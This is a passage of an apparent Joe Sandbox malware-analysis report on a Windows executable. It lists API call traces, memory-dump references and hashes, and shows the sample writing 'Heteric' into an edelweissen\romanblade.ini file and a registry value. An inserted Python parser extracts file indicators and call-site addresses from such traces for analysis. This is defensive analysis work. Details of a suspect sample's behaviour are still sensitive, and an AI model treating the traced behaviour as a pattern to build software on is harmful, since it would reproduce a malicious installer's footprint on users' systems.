                                                            • Instruction Fuzzy Hash: 0C410471200B05BFD2206B219D49F6B3AACEF85715F14043AF941F62D2EA7CF8018A7D
                                                            APIs
                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                            • DrawTextW.USER32(00000000,00433EA0,000000FF,00000010,00000820), ref: 00401156
                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                            • String ID: F
                                                            • API String ID: 941294808-1304234792
                                                            • Opcode ID: eba2a3bbcb5832d39a7808e3ae5c7eb99af93b299209f69c760ac1b0491d86a4
                                                            • Instruction ID: f1b70214e96eb8bec3146c709be0bbd1f29e4b49e587d4bf0c97a3ec82ce1e67
                                                            • Opcode Fuzzy Hash: eba2a3bbcb5832d39a7808e3ae5c7eb99af93b299209f69c760ac1b0491d86a4
                                                            • Instruction Fuzzy Hash: 00417C71400209AFCB058FA5DE459BF7BB9FF44315F00802EF591AA1A0C778EA54DFA4
                                                            APIs
                                                            • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\YrCSUX2O3I.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,76F93420,00403390), ref: 0040603D
                                                            • CharNextW.USER32(?,?,?,00000000), ref: 0040604C
                                                            • CharNextW.USER32(?,"C:\Users\user\Desktop\YrCSUX2O3I.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,76F93420,00403390), ref: 00406051
                                                            • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,76F93420,00403390), ref: 00406064
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: Char$Next$Prev
                                                            • String ID: "C:\Users\user\Desktop\YrCSUX2O3I.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                            • API String ID: 589700163-92336475
                                                            • Opcode ID: 73afb7676350ec278b66049aa62252973a0582d31a7c1b28115d42195e1f2e0a
                                                            • Instruction ID: fcf87bb4fcb389795acbe35438f6f12f46fcdf00a5008526b505f25df9ba4f2d
                                                            • Opcode Fuzzy Hash: 73afb7676350ec278b66049aa62252973a0582d31a7c1b28115d42195e1f2e0a
                                                            • Instruction Fuzzy Hash: B511B62684061299DB307B149C40B7763B8EF95760F51803FED8A732C0E77C5C9297AD
                                                            APIs
                                                            • WideCharToMultiByte.KERNEL32(?,?,C:\Program Files (x86)\edelweissen\romanblade.ini,000000FF,Heteric,00000400,?,?,00000021), ref: 0040252D
                                                            • lstrlenA.KERNEL32(Heteric,?,?,C:\Program Files (x86)\edelweissen\romanblade.ini,000000FF,Heteric,00000400,?,?,00000021), ref: 00402534
                                                            • WriteFile.KERNEL32(00000000,?,Heteric,00000000,?,?,00000000,00000011), ref: 00402566
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: ByteCharFileMultiWideWritelstrlen
                                                            • String ID: 8$C:\Program Files (x86)\edelweissen\romanblade.ini$Heteric
                                                            • API String ID: 1453599865-1441359250
                                                            • Opcode ID: 877e15414ace404058adc7f8c27eed512349f5fb36d6d15f4eee69221c79fb7a
                                                            • Instruction ID: 735716144e4411cb43a0d30ab2875379506436d26c05ff50a3a47e8288d67bee
                                                            • Opcode Fuzzy Hash: 877e15414ace404058adc7f8c27eed512349f5fb36d6d15f4eee69221c79fb7a
                                                            • Instruction Fuzzy Hash: 62019271A44604FED700ABB19E4DEAF7668EF5031AF20053BB102B60D1D6FC4D919A6D
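The "APIs" entries in each function record list the import called, its argument strings as the sandbox saw them, and the call-site address (`ref:`). In a report this long, the file-system artifacts (here the write of the string `Heteric` into `C:\Program Files (x86)\edelweissen\romanblade.ini`) and the addresses to pivot to in the disassembly are easier to pull out mechanically than by reading. The following parser is an added example and is not part of the Joe Sandbox report or of the sample; the trace lines embedded in it are a constructed sample copied in the shape of the entries above, and the regular expression assumes the `• Api.MODULE(args), ref: ADDR` layout (with the optional `Part of subcall function ADDR:` prefix and the bare `wsprintfA.USER32 ref: ...` form) shown on this page.

```python
"""Pull file-system IOCs and a per-import profile out of Joe Sandbox "APIs" trace lines."""
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample in the shape of the report's "APIs" entries: three lines of the
# romanblade.ini function, one no-argument entry and one "Part of subcall" entry.
SAMPLE_TRACE = r"""
• WideCharToMultiByte.KERNEL32(?,?,C:\Program Files (x86)\edelweissen\romanblade.ini,000000FF,Heteric,00000400,?,?,00000021), ref: 0040252D
• lstrlenA.KERNEL32(Heteric,?,?,C:\Program Files (x86)\edelweissen\romanblade.ini,000000FF,Heteric,00000400,?,?,00000021), ref: 00402534
• WriteFile.KERNEL32(00000000,?,Heteric,00000000,?,?,00000000,00000011), ref: 00402566
• wsprintfA.USER32 ref: 00405ACA
  • Part of subcall function 004059CF: GetFileAttributesW.KERNELBASE(00000003,00402D3F,C:\Users\user\Desktop\YrCSUX2O3I.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 004059D3
"""

# One entry: optional subcall prefix, Api.MODULE, optional "(args)," and the call-site address.
ENTRY_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\),)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
# A drive-letter path; the report wraps some argv strings in double quotes.
PATH_RE = re.compile(r'^"?(?P<p>[A-Za-z]:\\[^"]*)"?$')


@dataclass
class ApiCall:
    api: str
    module: str
    ref: str                              # call-site address in the dumped image
    args: List[str] = field(default_factory=list)
    subcall_of: Optional[str] = None      # callee address for "Part of subcall" entries


def parse_api_entries(text: str) -> List[ApiCall]:
    """Parse every recognised trace line; lines that are not API entries are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        # The report separates arguments with commas; an argument that itself
        # contains a comma would be split as well (none occur in this dump).
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("mod"), m.group("ref"), args, m.group("sub")))
    return calls


def file_artifacts(calls: List[ApiCall]) -> List[str]:
    """Unique drive-letter paths seen in any argument, sorted: the file-system IOCs to pivot on."""
    found = set()
    for c in calls:
        for a in c.args:
            m = PATH_RE.match(a)
            if m:
                found.add(m.group("p"))
    return sorted(found)


def call_sites_for(calls: List[ApiCall], path: str) -> List[str]:
    """Call-site addresses whose arguments mention `path`, for jumping to them in the disassembly."""
    refs = []
    for c in calls:
        for a in c.args:
            m = PATH_RE.match(a)
            if m and m.group("p") == path:
                refs.append(c.ref)
                break
    return refs


def api_summary(calls: List[ApiCall]) -> Counter:
    """Call-site count per Api.MODULE, the grouping the report's 'API ID' line summarises."""
    return Counter(f"{c.api}.{c.module}" for c in calls)


if __name__ == "__main__":
    calls = parse_api_entries(SAMPLE_TRACE)
    for p in file_artifacts(calls):
        print(p, "<-", ", ".join(call_sites_for(calls, p)))
    for name, n in api_summary(calls).most_common():
        print(f"{n:3d}  {name}")
```

Feed it the whole "APIs" section of a report rather than the sample and `file_artifacts` gives the path set to check against the dropped-file and registry sections, while `call_sites_for` turns each path into the addresses to open in the IDA snapshot named under "Joe Sandbox IDA Plugin".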
                                                            APIs
                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00404019
                                                            • GetSysColor.USER32(00000000), ref: 00404035
                                                            • SetTextColor.GDI32(?,00000000), ref: 00404041
                                                            • SetBkMode.GDI32(?,?), ref: 0040404D
                                                            • GetSysColor.USER32(?), ref: 00404060
                                                            • SetBkColor.GDI32(?,?), ref: 00404070
                                                            • DeleteObject.GDI32(?), ref: 0040408A
                                                            • CreateBrushIndirect.GDI32(?), ref: 00404094
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                            • String ID:
                                                            • API String ID: 2320649405-0
                                                            • Opcode ID: 878c72b768cb9ca2e83e307521140d4ebe6f79c9a792ccaf91322ed4afa210a0
                                                            • Instruction ID: 0ac1a71073e56fec278c78bb8edfd769e40e3e7d0c6ffac740e8a400aad481d4
                                                            • Opcode Fuzzy Hash: 878c72b768cb9ca2e83e307521140d4ebe6f79c9a792ccaf91322ed4afa210a0
                                                            • Instruction Fuzzy Hash: 7D2142B1500704ABC7319F68DE48B5B7BF8AF80714F04892DEA96B22A1D738E904CB54
                                                            APIs
                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 0040279F
                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 004027BB
                                                            • GlobalFree.KERNEL32(FFFFFD66), ref: 004027F4
                                                            • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402806
                                                            • GlobalFree.KERNEL32(00000000), ref: 0040280D
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402825
                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402839
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                            • String ID:
                                                            • API String ID: 3294113728-0
                                                            • Opcode ID: f954abbaefe45e02abbe794b2bd8106938d8a6f053d08db0e4a5cdc89549f7be
                                                            • Instruction ID: 2d0112b2776dca8d717dfd9e18d313b89dca9e7a3efaaf21f9fdf9ae57e92bf3
                                                            • Opcode Fuzzy Hash: f954abbaefe45e02abbe794b2bd8106938d8a6f053d08db0e4a5cdc89549f7be
                                                            • Instruction Fuzzy Hash: CE317C72800128BBCF116FA5CE499AE7A79EF09364F10423AF521762E0CB794D419BA8
                                                            APIs
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004048DF
                                                            • GetMessagePos.USER32 ref: 004048E7
                                                            • ScreenToClient.USER32(?,?), ref: 00404901
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404913
                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404939
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: Message$Send$ClientScreen
                                                            • String ID: f
                                                            • API String ID: 41195575-1993550816
                                                            • Opcode ID: 8022016cd060c827d0bdc105967e00620e8417d97f69c1817adc8455638bf95d
                                                            • Instruction ID: b2acda07281727c86be124b4dee47d1cf8a7ad48e0f381a449079fc6aa512a42
                                                            • Opcode Fuzzy Hash: 8022016cd060c827d0bdc105967e00620e8417d97f69c1817adc8455638bf95d
                                                            • Instruction Fuzzy Hash: 6F014C71900219BADB10DBA4DD85BFFBBBCAF59711F10012ABB50B61D0D6B499018BA4
APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C33
• MulDiv.KERNEL32(001049D3,00000064,001052D8), ref: 00402C5E
• wsprintfW.USER32 ref: 00402C6E
• SetWindowTextW.USER32(?,?), ref: 00402C7E
• SetDlgItemTextW.USER32(?,00000406,?), ref: 00402C90
Strings
• verifying installer: %d%%, xrefs: 00402C68
Memory Dump Source
• Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: verifying installer: %d%%
• API String ID: 1451636040-82062127
• Opcode ID: 2adaee7f08b790a47a5c37bc0b59c1f8a60a08f948b502380a8ffb43cce8331f
• Instruction ID: fc2375c20bf1a940e442d42f67f4bd9350dc1e6ed8ae84fb9db5d2f1b0513ae1
• Opcode Fuzzy Hash: 2adaee7f08b790a47a5c37bc0b59c1f8a60a08f948b502380a8ffb43cce8331f
• Instruction Fuzzy Hash: 28014F70640208BBEF24AF61DD49BEE3B69FB04309F008439FA06A91D0DBB89555CF59
APIs
• GetDC.USER32(?), ref: 00401D44
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
• MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
• ReleaseDC.USER32(?,00000000), ref: 00401D71
• CreateFontIndirectW.GDI32(0040CD80), ref: 00401DBC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
Similarity
• API ID: CapsCreateDeviceFontIndirectRelease
• String ID: Calibri
• API String ID: 3808545654-1409258342
• Opcode ID: 1135941911433aa1456fa73da62822fc59eae25dd4671b135b33c63ab7780ad9
• Instruction ID: ac5daf38e842c3ef37672eab1df37869b96295c9a8c7d69064dded374e835ef9
• Opcode Fuzzy Hash: 1135941911433aa1456fa73da62822fc59eae25dd4671b135b33c63ab7780ad9
• Instruction Fuzzy Hash: 1B016D35544640EFEB016BB0AF4AB9A3FB4EF25305F144579F545B62E2CA78040A9B2D
APIs
• ReadFile.KERNEL32(?,?,00000001,?), ref: 004025CA
• MultiByteToWideChar.KERNEL32(?,?,?,00000001,?,00000001), ref: 004025EC
• ReadFile.KERNEL32(?,?,00000002,?), ref: 00402607
  • Part of subcall function 00405C8D: wsprintfW.USER32 ref: 00405C9A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
Similarity
• API ID: FileRead$ByteCharMultiWidewsprintf
• String ID: 9
• API String ID: 3029736425-2366072709
• Opcode ID: 6119b3fc78681a85ba9cd50a76468ca8cd985537187a5c82c8e636e21472dda3
• Instruction ID: 3f2e9d39a30109d4dd297e12bf5cacaacaa6ae2deeb589865bf4cc510dd46cad
• Opcode Fuzzy Hash: 6119b3fc78681a85ba9cd50a76468ca8cd985537187a5c82c8e636e21472dda3
• Instruction Fuzzy Hash: 1A315E7190021AAADF20DF94DA88EBEB7B9EB14344F50443BE401F62D4D7B98A818B59
APIs
• RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
• lstrlenW.KERNEL32(C:\Program Files (x86)\edelweissen\romanblade.ini,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
• RegSetValueExW.ADVAPI32(?,?,?,?,C:\Program Files (x86)\edelweissen\romanblade.ini,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
